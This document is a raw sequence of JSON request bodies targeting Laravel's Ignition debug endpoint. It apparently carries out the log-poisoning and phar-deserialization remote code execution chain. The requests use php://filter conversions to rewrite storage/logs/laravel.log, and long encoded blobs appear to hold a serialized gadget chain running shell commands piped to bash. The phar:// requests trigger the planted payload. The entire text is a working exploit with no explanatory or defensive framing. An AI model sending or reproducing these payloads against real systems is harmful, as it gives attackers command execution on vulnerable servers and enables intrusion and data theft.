=4D=00=57=00=4E=00=74=00=64=00=32=00=39=00=4C=00=55=00=30=00=49=00=33=00=51=00=32=00=6C=00=42=00=5A=00=32=00=4E=00=74=00=56=00=6D=00=68=00=61=00=51=00=30=00=4A=00=33=00=59=00=32=00=30=00=35=00=4D=00=47=00=4A=00=35=00=51=00=6E=00=70=00=61=00=57=00=45=00=6F=00=79=00=57=00=6C=00=68=00=4A=00=5A=00=32=00=4E=00=48=00=52=00=6A=00=42=00=68=00=51=00=30=00=45=00=34=00=55=00=45=00=52=00=33=00=61=00=30=00=74=00=48=00=56=00=6D=00=70=00=68=00=52=00=7A=00=68=00=6E=00=53=00=6B=00=68=00=7A=00=65=00=45=00=78=00=35=00=4F=00=48=00=5A=00=4D=00=65=00=55=00=49=00=35=00=53=00=31=00=46=00=76=00=5A=00=30=00=6C=00=46=00=55=00=6C=00=42=00=52=00=65=00=6A=00=42=00=32=00=53=00=6B=00=68=00=30=00=64=00=31=00=6C=00=59=00=55=00=6D=00=39=00=4D=00=65=00=54=00=68=00=6E=00=54=00=48=00=6B=00=35=00=4F=00=55=00=4E=00=70=00=51=00=57=00=64=00=54=00=52=00=54=00=6C=00=55=00=56=00=6B=00=51=00=77=00=61=00=32=00=55=00=7A=00=54=00=6D=00=78=00=6A=00=62=00=6C=00=70=00=73=00=59=00=32=00=6B=00=34=00=64=00=6B=00=39=00=70=00=63=00=44=00=6C=00=44=00=61=00=55=00=46=00=6E=00=56=00=55=00=55=00=35=00=55=00=31=00=5A=00=45=00=4D=00=47=00=74=00=6C=00=4D=00=30=00=35=00=73=00=59=00=32=00=35=00=61=00=62=00=47=00=4E=00=70=00=4F=00=48=00=5A=00=4C=00=61=00=6E=00=41=00=35=00=51=00=32=00=6C=00=42=00=5A=00=31=00=63=00=78=00=63=00=32=00=64=00=6C=00=51=00=30=00=6C=00=72=00=5A=00=54=00=42=00=6F=00=55=00=46=00=55=00=78=00=55=00=6A=00=6C=00=4A=00=61=00=55=00=45=00=35=00=55=00=46=00=4E=00=43=00=4E=00=45=00=6C=00=70=00=55=00=6A=00=64=00=56=00=52=00=54=00=6C=00=54=00=56=00=6B=00=67=00=77=00=61=00=55=00=6C=00=47=00=4D=00=57=00=52=00=4A=00=51=00=31=00=6C=00=74=00=53=00=55=00=5A=00=43=00=55=00=46=00=56=00=73=00=55=00=54=00=6C=00=50=00=52=00=45=00=46=00=4C=00=51=00=32=00=6C=00=42=00=5A=00=31=00=70=00=59=00=61=00=47=00=78=00=5A=00=65=00=55=00=46=00=36=00=55=00=45=00=51=00=30=00=64=00=6C=00=70=00=48=00=56=00=6A=00=4A=00=4D=00=4D=00=31=00=4A=00=71=00=59=00=30=00=4D=00=34=00=61=00=32=00=55=00=77=00=61=00=46=00=42=00=56=00=4D=00=56=00=49=00=35=00=54=00=48=00=6C=00=53=00=55=00=56=00=51=00=78=00=53=00=6C=00=56=00=44=00=61=00=55=00=46=00=6E=00=57=00=6C=00=64=00=4F=00=62=00=32=00=4A=00=35=00=51=00=58=00=52=00=61=00=56=00=7A=00=52=00=6E=00=53=00=57=00=74=00=6B=00=52=00=6C=00=5A=00=44=00=51=00=57=00=74=00=6C=00=4D=00=46=00=4A=00=51=00=55=00=54=00=4D=00=77=00=5A=00=31=00=4E=00=47=00=55=00=6C=00=56=00=56=00=51=00=7A=00=68=00=34=00=54=00=47=00=70=00=43=00=59=00=32=00=4E=00=73=00=65=00=48=00=56=00=54=00=52=00=7A=00=6C=00=36=00=5A=00=45=00=52=00=76=00=5A=00=30=00=70=00=49=00=64=00=45=00=6C=00=55=00=4D=00=55=00=35=00=56=00=5A=00=6C=00=5A=00=34=00=65=00=56=00=68=00=48=00=4E=00=57=00=4E=00=6A=00=62=00=48=00=68=00=31=00=53=00=57=00=6C=00=42=00=4B=00=30=00=70=00=71=00=54=00=55=00=74=00=4A=00=51=00=30=00=46=00=76=00=5A=00=44=00=4A=00=6F=00=63=00=47=00=4A=00=48=00=56=00=57=00=64=00=6A=00=62=00=56=00=5A=00=6F=00=57=00=6B=00=4E=00=43=00=63=00=32=00=46=00=58=00=4E=00=57=00=78=00=50=00=65=00=55=00=4A=00=72=00=59=00=6E=00=64=00=76=00=5A=00=30=00=6C=00=44=00=51=00=6D=00=4A=00=58=00=65=00=55=00=46=00=70=00=53=00=6B=00=64=00=34=00=63=00=47=00=4A=00=74=00=56=00=57=00=6C=00=4A=00=52=00=44=00=41=00=35=00=53=00=55=00=4E=00=52=00=62=00=6C=00=68=00=49=00=53=00=57=00=35=00=4A=00=52=00=6A=00=46=00=6B=00=53=00=55=00=4E=00=5A=00=62=00=55=00=6C=00=48=00=53=00=6E=00=6C=00=61=00=56=00=30=00=5A=00=79=00=51=00=32=00=6C=00=42=00=5A=00=31=00=70=00=48=00=4F=00=58=00=56=00=61=00=55=00=30=00=46=00=74=00=53=00=6D=00=6C=00=43=00=61=00=6C=00=6C=00=59=00=55=00=58=00=42=00=4A=00=52=00=48=00=64=00=74=00=54=00=58=00=64=00=76=00=5A=00=30=00=6C=00=48=00=56=00=6A=00=52=00=61=00=56=00=30=00=31=00=6E=00=54=00=58=00=6F=00=30=00=62=00=55=00=78=00=52=00=63=00=44=00=6C=00=44=00=5A=00=33=00=42=00=77=00=57=00=6D=00=6C=00=43=00=59=00=6B=00=6C=00=44=00=4D=00=54=00=52=00=4A=00=51=00=30=00=6C=00=72=00=53=00=30=00=64=00=4F=00=64=00=6D=00=4A=00=58=00=4D=00=57=00=68=00=69=00=62=00=56=00=46=00=6E=00=54=00=46=00=68=00=5A=00=5A=00=31=00=6B=00=7A=00=56=00=6E=00=6C=00=69=00=51=00=32=00=74=00=70=00=53=00=55=00=59=00=77=00=4E=00=30=00=6C=00=49=00=55=00=6D=00=39=00=61=00=56=00=7A=00=52=00=4C=00=53=00=55=00=4E=00=43=00=61=00=6D=00=52=00=59=00=53=00=6E=00=4E=00=4A=00=52=00=45=00=55=00=31=00=54=00=6B=00=4D=00=30=00=4E=00=45=00=35=00=35=00=4E=00=48=00=6C=00=4F=00=56=00=45=00=6C=00=31=00=54=00=56=00=52=00=56=00=4E=00=55=00=77=00=79=00=65=00=48=00=6C=00=4D=00=62=00=6B=00=35=00=76=00=5A=00=6B=00=64=00=4B=00=61=00=47=00=4D=00=79=00=5A=00=30=00=74=00=61=00=56=00=33=00=68=00=77=00=57=00=6D=00=6C=00=43=00=59=00=6B=00=6C=00=44=00=4D=00=54=00=52=00=4A=00=51=00=30=00=6C=00=72=00=53=00=30=00=64=00=4F=00=64=00=6D=00=4A=00=58=00=4D=00=57=00=68=00=69=00=62=00=56=00=46=00=6E=00=54=00=46=00=68=00=5A=00=5A=00=32=00=51=00=79=00=5A=00=47=00=78=00=6B=00=51=00=32=00=74=00=70=00=53=00=55=00=59=00=77=00=4E=00=30=00=6C=00=49=00=55=00=6D=00=39=00=61=00=56=00=7A=00=52=00=4C=00=53=00=55=00=4E=00=43=00=4D=00=31=00=6F=00=79=00=56=00=6A=00=42=00=4A=00=51=00=7A=00=46=00=34=00=53=00=55=00=4D=00=78=00=55=00=45=00=78=00=54=00=51=00=58=00=68=00=50=00=56=00=46=00=46=00=31=00=54=00=30=00=52=00=6A=00=64=00=55=00=31=00=71=00=56=00=58=00=6C=00=4D=00=61=00=6B=00=55=00=78=00=54=00=31=00=4D=00=35=00=63=00=32=00=4E=00=70=00=4E=00=58=00=70=00=68=00=53=00=48=00=68=00=70=00=57=00=56=00=68=00=4F=00=62=00=30=00=4E=00=74=00=56=00=6E=00=4E=00=6A=00=4D=00=6C=00=56=00=4C=00=53=00=55=00=4E=00=43=00=5A=00=6C=00=67=00=79=00=54=00=6A=00=46=00=6A=00=62=00=58=00=64=00=6E=00=59=00=55=00=68=00=53=00=4D=00=47=00=4E=00=45=00=62=00=33=00=5A=00=4D=00=65=00=6B=00=55=00=31=00=54=00=6B=00=4D=00=30=00=4E=00=45=00=35=00=35=00=4E=00=48=00=6C=00=4F=00=56=00=45=00=6C=00=31=00=54=00=56=00=52=00=56=00=4E=00=55=00=77=00=79=00=65=00=48=00=6C=00=4E=00=61=00=54=00=56=00=36=00=59=00=55=00=68=00=34=00=61=00=56=00=6C=00=59=00=54=00=6D=00=39=00=44=00=62=00=56=00=70=00=77=00=66=00=47=00=4A=00=68=00=63=00=32=00=55=00=32=00=4E=00=43=00=41=00=74=00=5A=00=48=00=78=00=69=00=59=00=58=00=4E=00=6F=00=49=00=43=00=59=00=6D=00=49=00=47=00=56=00=6A=00=61=00=47=00=38=00=67=00=4D=00=47=00=4A=00=6B=00=4E=00=7A=00=6B=00=35=00=4D=00=47=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=6C=00=75=00=61=00=58=00=52=00=70=00=59=00=57=00=78=00=70=00=65=00=6D=00=56=00=6B=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=54=00=47=00=6C=00=74=00=61=00=58=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=32=00=39=00=79=00=63=00=79=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=6A=00=64=00=58=00=4A=00=79=00=5A=00=57=00=35=00=30=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=32=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=69=00=4F=00=33=00=31=00=39=00=66=00=51=00=67=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=78=00=2B=00=66=00=39=00=69=00=6B=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=51=00=48=00=72=00=48=00=79=00=48=00=66=00=76=00=52=00=42=00=57=00=67=00=48=00=53=00=78=00=72=00=2F=00=76=00=56=00=2B=00=78=00=68=00=75=00=53=00=2F=00=33=00=2B=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "phar://../storage/logs/laravel.log/test.txt"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "aa"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=30=00=42=00=51=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=2B=00=42=00=51=00=41=00=41=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=55=00=36=00=49=00=6B=00=31=00=76=00=62=00=6D=00=39=00=73=00=62=00=32=00=64=00=63=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=6C=00=78=00=4F=00=59=00=58=00=52=00=70=00=64=00=6D=00=56=00=4E=00=59=00=57=00=6C=00=73=00=5A=00=58=00=4A=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=49=00=6A=00=6F=00=33=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=52=00=76=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=4E=00=31=00=59=00=6D=00=70=00=6C=00=59=00=33=00=51=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=56=00=68=00=5A=00=47=00=56=00=79=00=63=00=79=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=69=00=59=00=6D=00=78=00=6C=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=6A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=6D=00=39=00=79=00=62=00=57=00=46=00=30=00=64=00=47=00=56=00=79=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6C=00=4E=00=70=00=65=00=6D=00=55=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4F=00=44=00=6B=00=30=00=4F=00=69=00=4A=00=6C=00=59=00=32=00=68=00=76=00=49=00=44=00=42=00=69=00=5A=00=44=00=63=00=35=00=4F=00=54=00=42=00=68=00=49=00=43=00=59=00=6D=00=49=00=47=00=56=00=6A=00=61=00=47=00=38=00=67=00=53=00=58=00=6C=00=46=00=64=00=6C=00=6C=00=74=00=62=00=48=00=56=00=4D=00=4D=00=6B=00=70=00=6F=00=59=00=7A=00=4A=00=6E=00=53=00=32=00=4E=00=48=00=64=00=48=00=42=00=69=00=52=00=33=00=64=00=6E=00=54=00=46=00=64=00=5A=00=5A=00=32=00=56=00=75=00=54=00=6A=00=4A=00=5A=00=64=00=33=00=42=00=33=00=59=00=54=00=4A=00=73=00=63=00=32=00=4A=00=44=00=51=00=58=00=52=00=61=00=61=00=55=00=4A=00=33=00=57=00=6B=00=64=00=57=00=62=00=56=00=70=00=58=00=4E=00=57=00=74=00=61=00=57=00=45=00=70=00=72=00=51=00=32=00=35=00=43=00=63=00=6D=00=46=00=58=00=65=00=48=00=4E=00=4A=00=51=00=7A=00=46=00=74=00=53=00=55=00=68=00=57=00=64=00=31=00=70=00=48=00=52=00=6A=00=42=00=61=00=56=00=30=00=35=00=76=00=57=00=6C=00=64=00=4F=00=63=00=6C=00=70=00=59=00=53=00=6D=00=74=00=44=00=5A=00=33=00=42=00=74=00=5A=00=46=00=63=00=31=00=61=00=6D=00=52=00=48=00=62=00=48=00=5A=00=69=00=61=00=55=00=4A=00=6D=00=57=00=44=00=4A=00=4F=00=4D=00=57=00=4E=00=74=00=64=00=32=00=39=00=4C=00=55=00=30=00=49=00=33=00=51=00=32=00=6C=00=42=00=5A=00=32=00=4E=00=74=00=56=00=6D=00=68=00=61=00=51=00=30=00=4A=00=33=00=59=00=32=00=30=00=35=00=4D=00=47=00=4A=00=35=00=51=00=6E=00=70=00=61=00=57=00=45=00=6F=00=79=00=57=00=6C=00=68=00=4A=00=5A=00=32=00=4E=00=48=00=52=00=6A=00=42=00=68=00=51=00=30=00=45=00=34=00=55=00=45=00=52=00=33=00=61=00=30=00=74=00=48=00=56=00=6D=00=70=00=68=00=52=00=7A=00=68=00=6E=00=53=00=6B=00=68=00=7A=00=65=00=45=00=78=00=35=00=4F=00=48=00=5A=00=4D=00=65=00=55=00=49=00=35=00=53=00=31=00=46=00=76=00=5A=00=30=00=6C=00=46=00=55=00=6C=00=42=00=52=00=65=00=6A=00=42=00=32=00=53=00=6B=00=68=00=30=00=64=00=31=00=6C=00=59=00=55=00=6D=00=39=00=4D=00=65=00=54=00=68=00=6E=00=54=00=48=00=6B=00=35=00=4F=00=55=00=4E=00=70=00=51=00=57=00=64=00=54=00=52=00=54=00=6C=00=55=00=56=00=6B=00=51=00=77=00=61=00=32=00=55=00=7A=00=54=00=6D=00=78=00=6A=00=62=00=6C=00=70=00=73=00=59=00=32=00=6B=00=34=00=64=00=6B=00=39=00=70=00=63=00=44=00=6C=00=44=00=61=00=55=00=46=00=6E=00=56=00=55=00=55=00=35=00=55=00=31=00=5A=00=45=00=4D=00=47=00=74=00=6C=00=4D=00=30=00=35=00=73=00=59=00=32=00=35=00=61=00=62=00=47=00=4E=00=70=00=4F=00=48=00=5A=00=4C=00=61=00=6E=00=41=00=35=00=51=00=32=00=6C=00=42=00=5A=00=31=00=63=00=78=00=63=00=32=00=64=00=6C=00=51=00=30=00=6C=00=72=00=5A=00=54=00=42=00=6F=00=55=00=46=00=55=00=78=00=55=00=6A=00=6C=00=4A=00=61=00=55=00=45=00=35=00=55=00=46=00=4E=00=43=00=4E=00=45=00=6C=00=70=00=55=00=6A=00=64=00=56=00=52=00=54=00=6C=00=54=00=56=00=6B=00=67=00=77=00=61=00=55=00=6C=00=47=00=4D=00=57=00=52=00=4A=00=51=00=31=00=6C=00=74=00=53=00=55=00=5A=00=43=00=55=00=46=00=56=00=73=00=55=00=54=00=6C=00=50=00=52=00=45=00=46=00=4C=00=51=00=32=00=6C=00=42=00=5A=00=31=00=70=00=59=00=61=00=47=00=78=00=5A=00=65=00=55=00=46=00=36=00=55=00=45=00=51=00=30=00=64=00=6C=00=70=00=48=00=56=00=6A=00=4A=00=4D=00=4D=00=31=00=4A=00=71=00=59=00=30=00=4D=00=34=00=61=00=32=00=55=00=77=00=61=00=46=00=42=00=56=00=4D=00=56=00=49=00=35=00=54=00=48=00=6C=00=53=00=55=00=56=00=51=00=78=00=53=00=6C=00=56=00=44=00=61=00=55=00=46=00=6E=00=57=00=6C=00=64=00=4F=00=62=00=32=00=4A=00=35=00=51=00=58=00=52=00=61=00=56=00=7A=00=52=00=6E=00=53=00=57=00=74=00=6B=00=52=00=6C=00=5A=00=44=00=51=00=57=00=74=00=6C=00=4D=00=46=00=4A=00=51=00=55=00=54=00=4D=00=77=00=5A=00=31=00=4E=00=47=00=55=00=6C=00=56=00=56=00=51=00=7A=00=68=00=34=00=54=00=47=00=70=00=43=00=59=00=32=00=4E=00=73=00=65=00=48=00=56=00=54=00=52=00=7A=00=6C=00=36=00=5A=00=45=00=52=00=76=00=5A=00=30=00=70=00=49=00=64=00=45=00=6C=00=55=00=4D=00=55=00=35=00=56=00=5A=00=6C=00=5A=00=34=00=65=00=56=00=68=00=48=00=4E=00=57=00=4E=00=6A=00=62=00=48=00=68=00=31=00=53=00=57=00=6C=00=42=00=4B=00=30=00=70=00=71=00=54=00=55=00=74=00=4A=00=51=00=30=00=46=00=76=00=5A=00=44=00=4A=00=6F=00=63=00=47=00=4A=00=48=00=56=00=57=00=64=00=6A=00=62=00=56=00=5A=00=6F=00=57=00=6B=00=4E=00=43=00=63=00=32=00=46=00=58=00=4E=00=57=00=78=00=50=00=65=00=55=00=4A=00=72=00=59=00=6E=00=64=00=76=00=5A=00=30=00=6C=00=44=00=51=00=6D=00=4A=00=58=00=65=00=55=00=46=00=70=00=53=00=6B=00=64=00=34=00=63=00=47=00=4A=00=74=00=56=00=57=00=6C=00=4A=00=52=00=44=00=41=00=35=00=53=00=55=00=4E=00=52=00=62=00=6C=00=68=00=49=00=53=00=57=00=35=00=4A=00=52=00=6A=00=46=00=6B=00=53=00=55=00=4E=00=5A=00=62=00=55=00=6C=00=48=00=53=00=6E=00=6C=00=61=00=56=00=30=00=5A=00=79=00=51=00=32=00=6C=00=42=00=5A=00=31=00=70=00=48=00=4F=00=58=00=56=00=61=00=55=00=30=00=46=00=74=00=53=00=6D=00=6C=00=43=00=61=00=6C=00=6C=00=59=00=55=00=58=00=42=00=4A=00=52=00=48=00=64=00=74=00=54=00=58=00=64=00=76=00=5A=00=30=00=6C=00=48=00=56=00=6A=00=52=00=61=00=56=00=30=00=31=00=6E=00=54=00=58=00=6F=00=30=00=62=00=55=00=78=00=52=00=63=00=44=00=6C=00=44=00=5A=00=33=00=42=00=77=00=57=00=6D=00=6C=00=43=00=59=00=6B=00=6C=00=44=00=4D=00=54=00=52=00=4A=00=51=00=30=00=6C=00=72=00=53=00=30=00=64=00=4F=00=64=00=6D=00=4A=00=58=00=4D=00=57=00=68=00=69=00=62=00=56=00=46=00=6E=00=54=00=46=00=68=00=5A=00=5A=00=31=00=6B=00=7A=00=56=00=6E=00=6C=00=69=00=51=00=32=00=74=00=70=00=53=00=55=00=59=00=77=00=4E=00=30=00=6C=00=49=00=55=00=6D=00=39=00=61=00=56=00=7A=00=52=00=4C=00=53=00=55=00=4E=00=43=00=61=00=6D=00=52=00=59=00=53=00=6E=00=4E=00=4A=00=52=00=45=00=55=00=31=00=54=00=6B=00=4D=00=30=00=4E=00=45=00=35=00=35=00=4E=00=48=00=6C=00=4F=00=56=00=45=00=6C=00=31=00=54=00=56=00=52=00=56=00=4E=00=55=00=77=00=79=00=65=00=48=00=6C=00=4D=00=62=00=6B=00=35=00=76=00=5A=00=6B=00=64=00=4B=00=61=00=47=00=4D=00=79=00=5A=00=30=00=74=00=61=00=56=00=33=00=68=00=77=00=57=00=6D=00=6C=00=43=00=59=00=6B=00=6C=00=44=00=4D=00=54=00=52=00=4A=00=51=00=30=00=6C=00=72=00=53=00=30=00=64=00=4F=00=64=00=6D=00=4A=00=58=00=4D=00=57=00=68=00=69=00=62=00=56=00=46=00=6E=00=54=00=46=00=68=00=5A=00=5A=00=32=00=51=00=79=00=5A=00=47=00=78=00=6B=00=51=00=32=00=74=00=70=00=53=00=55=00=59=00=77=00=4E=00=30=00=6C=00=49=00=55=00=6D=00=39=00=61=00=56=00=7A=00=52=00=4C=00=53=00=55=00=4E=00=43=00=4D=00=31=00=6F=00=79=00=56=00=6A=00=42=00=4A=00=51=00=7A=00=46=00=34=00=53=00=55=00=4D=00=78=00=55=00=45=00=78=00=54=00=51=00=58=00=68=00=50=00=56=00=46=00=46=00=31=00=54=00=30=00=52=00=6A=00=64=00=55=00=31=00=71=00=56=00=58=00=6C=00=4D=00=61=00=6B=00=55=00=78=00=54=00=31=00=4D=00=35=00=63=00=32=00=4E=00=70=00=4E=00=58=00=70=00=68=00=53=00=48=00=68=00=70=00=57=00=56=00=68=00=4F=00=62=00=30=00=4E=00=74=00=56=00=6E=00=4E=00=6A=00=4D=00=6C=00=56=00=4C=00=53=00=55=00=4E=00=43=00=5A=00=6C=00=67=00=79=00=54=00=6A=00=46=00=6A=00=62=00=58=00=64=00=6E=00=59=00=55=00=68=00=53=00=4D=00=47=00=4E=00=45=00=62=00=33=00=5A=00=4D=00=65=00=6B=00=55=00=31=00=54=00=6B=00=4D=00=30=00=4E=00=45=00=35=00=35=00=4E=00=48=00=6C=00=4F=00=56=00=45=00=6C=00=31=00=54=00=56=00=52=00=56=00=4E=00=55=00=77=00=79=00=65=00=48=00=6C=00=4E=00=61=00=54=00=56=00=36=00=59=00=55=00=68=00=34=00=61=00=56=00=6C=00=59=00=54=00=6D=00=39=00=44=00=62=00=56=00=70=00=77=00=66=00=47=00=4A=00=68=00=63=00=32=00=55=00=32=00=4E=00=43=00=41=00=74=00=5A=00=48=00=78=00=69=00=59=00=58=00=4E=00=6F=00=49=00=43=00=59=00=6D=00=49=00=47=00=56=00=6A=00=61=00=47=00=38=00=67=00=4D=00=47=00=4A=00=6B=00=4E=00=7A=00=6B=00=35=00=4D=00=47=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=69=00=59=00=6D=00=78=00=6C=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=6A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=6D=00=39=00=79=00=62=00=57=00=46=00=30=00=64=00=47=00=56=00=79=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=30=00=34=00=37=00=66=00=51=00=67=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=78=00=2B=00=66=00=39=00=69=00=6B=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=54=00=6A=00=6A=00=45=00=66=00=6C=00=55=00=59=00=54=00=4D=00=2F=00=4E=00=41=00=48=00=6A=00=63=00=46=00=2B=00=38=00=5A=00=63=00=33=00=43=00=5A=00=7A=00=33=00=76=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "phar://../storage/logs/laravel.log/test.txt"\n }\n }
